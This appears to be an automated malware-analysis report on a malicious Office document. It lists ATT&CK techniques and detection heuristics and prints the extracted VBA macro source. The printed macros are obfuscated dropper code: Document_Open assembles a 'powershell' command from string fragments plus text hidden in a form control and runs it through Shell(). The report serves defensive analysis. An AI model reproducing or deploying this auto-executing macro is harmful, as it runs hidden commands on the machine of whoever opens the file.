MALICIOUS
222
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1059 Command and Scripting Interpreter
T1204.002 Malicious File
The sample contains VBA macros, including a Document_Open macro, which is a common technique for executing malicious code upon opening the document. The critical heuristic 'OLE_VBA_SHELL' indicates the use of the Shell() function, which is used in the 'mYTvnd' function to execute a command. The script attempts to construct a command string that includes 'SHELL ' and other obfuscated parts, likely to download and execute a second-stage payload.
Heuristics 6
-
ClamAV: Doc.Dropper.Agent-6846992-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Dropper.Agent-6846992-0
-
VBA macros detected medium 3 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Shell() call in VBA critical OLE_VBA_SHELLShell() call in VBA
-
Document_Open macro high OLE_VBA_DOCOPENDocument_Open macro
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 1802 bytes |
SHA-256: 373fcd3c95570b8e906675c479c15f96854bf7915d2aea9bc9e2f912a61fe9ce |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub Document_Open()
Call w("er")
End Sub
Attribute VB_Name = "ggCs2Jcxp"
Sub w(J97H5)
Dim PVqS2h0t As Long
PVqS2h0t = (20772 / 1154) + (14)
Dim wTMHAeENr(2 To 59) As String
wTMHAeENr(2) = "V0xCz"
Dim kTjV1
kTjV1 = tnErm1UcN
Dim WEtuUy6(14 To 174) As String
WEtuUy6(14) = "N5zm6aFxB"
Dim ANBt5p As Long
ANBt5p = (8866 / 286) + (45)
Dim N4RikE
N4RikE = PYiKDFq
lhGzn = "SHE" & "LL "
iFyKAsz7 = "ow"
fuFBdJlEi = J97H5
Dim W8ygn(13 To 154) As Long
W8ygn(13) = 327 - 213
mYTvnd NV01lfp() & iFyKAsz7 & fuFBdJlEi & lhGzn & hqO3fpNtJ
End Sub
Attribute VB_Name = "i0QbHuhZ"
Public Function NV01lfp() As String
Dim Q4WwR As Long
Q4WwR = (960 - 931) / (2)
NV01lfp = "p"
End Function
Function mYTvnd(yy2uMWJp)
mYTvnd = Shell(yy2uMWJp, False)
End Function
Attribute VB_Name = "KoNADrm4"
Public Function hqO3fpNtJ()
Dim iO0Z4 As Long
iO0Z4 = (-489 + 519) + (37)
Dim bbuiM(9 To 58) As Long
bbuiM(9) = -145 + 258
Dim TwpEkF As Object
Dim I25qP As Long
I25qP = (5655 / 377) * (4)
Set TwpEkF = New f
Dim eYnWwcr As String
eYnWwcr = TwpEkF.de.Text
Dim cLETjut01(11 To 91) As String
cLETjut01(11) = "ravWnDr9"
hqO3fpNtJ = eYnWwcr
End Function
Attribute VB_Name = "f"
Attribute VB_Base = "0{3771884B-4B4D-4DC5-9623-3D0AAF20A049}{8C0A326B-BFB2-4820-B02A-DEE83F228607}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.